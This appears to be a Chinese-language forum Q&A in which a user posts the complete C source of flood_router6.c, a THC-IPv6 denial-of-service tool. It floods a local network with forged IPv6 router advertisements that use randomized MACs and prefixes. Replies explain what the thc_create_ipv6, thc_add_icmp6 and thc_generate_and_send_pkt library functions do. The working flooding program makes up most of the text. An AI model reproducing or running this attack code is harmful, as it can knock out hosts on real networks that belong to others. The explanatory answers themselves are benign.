此代码是来自http://www.thc.org/的BackTrack中的拒绝服务攻击程序该代码的名称是flood_router6.c
在下面的代码中,我遇到了这些函数在做什么的问题:
thc_create_ipv6()
thc_add_icmp6()
thc_generate_and_send_pkt()
在"thc-ipv6.h"库中没有类似的函数。这些函数是做什么的?我在谷歌上搜索了一下,没有答案。有人能帮忙吗?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <time.h>
#include <pcap.h>
#include "thc-ipv6.h"
extern int debug;
void help(char *prg) {
printf("%s %s (c) 2010 by %s %snn", prg, VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s [-r] interfacenn", prg);
printf("Flood the local network with router advertisements.n");
printf("Use -r to use raw mode.nn");
exit(-1);
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
unsigned char buf[56];
unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
int size, mtu, i;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
int count = 0;
if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
mtu = 1500;
size = 64;
ip6 = malloc(16);
routerip6 = malloc(16);
route6 = malloc(16);
mac[0] = 0x00;
mac[1] = 0x18;
memset(ip6, 0, 16);
ip6[0] = 0xfe;
ip6[1] = 0x80;
ip6[8] = 0x02;
ip6[9] = mac[1];
ip6[11] = 0xff;
ip6[12] = 0xfe;
routerip6[0] = 0x2a;
routerip6[1] = 0x01;
routerip6[15] = 0x01;
memset(route6 + 8, 0, 8);
printf("Starting to flood network with router advertisements on %s
(Press Control-C to end, a dot is printed for every 100 packet):n", interface);
while (1) {
for (i = 2; i < 6; i++)
mac[i] = rand() % 256;
for (i = 2; i < 8; i++)
routerip6[i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
memcpy(route6, routerip6, 8);
count++;
memset(buf, 0, sizeof(buf));
buf[1] = 250;
buf[5] = 30;
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
buf[16] = 3;
buf[17] = 4;
buf[18] = size;
buf[19] = 128 + 64 + 32;
memset(&buf[20], 255, 8);
memcpy(&buf[32], route6, 16);
buf[48] = 1;
buf[49] = 1;
memcpy(&buf[50], mac6, 6);
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
perror("");
return -1;
}
pkt = thc_destroy_packet(pkt);
usleep(1);
if (count % 100 == 0)
printf(".");
}
return 0;
}
THC-IPv6是一组用来攻击IPV6固有协议弱点的工具。该项目是THC的一部分,即黑客的选择。你可以找到关于这个项目的详细信息:http://www.thc.org/thc-ipv6/
THC-IPv6不仅提供了攻击工具,还提供了一个方便的库。该库可用于开发您自己的应用程序,例如创建特定的IPv6数据包。http://www.thc.org/thc-ipv6/README
基本上,thc_create_ipv6()用于创建不带扩展头的IPv6报文。thc_add_icmp6()将把icmpv6头添加到这个数据包中,thc_generate_and_send_pkt()将把这个数据包发送到wire。关于THC-IPv6库的更多细节请参考README.
你没有真正看-函数在thc-ipv6.h中定义,它们的代码在thc-ipv6-lib.c
thc_create_ipv6()函数创建基本IPv6包,并且在库的任何其他包函数之前需要。the_add_icmp6()为IPv6报文添加ICMPv6头。还有更多的thc_add_*函数,例如用于UDP, TCP或扩展头。最后thc_generate_and_send_pkt()将构建数据包并将其发送到网络。
参见README。smurf6.c文件是如何使用该库的一个简单示例。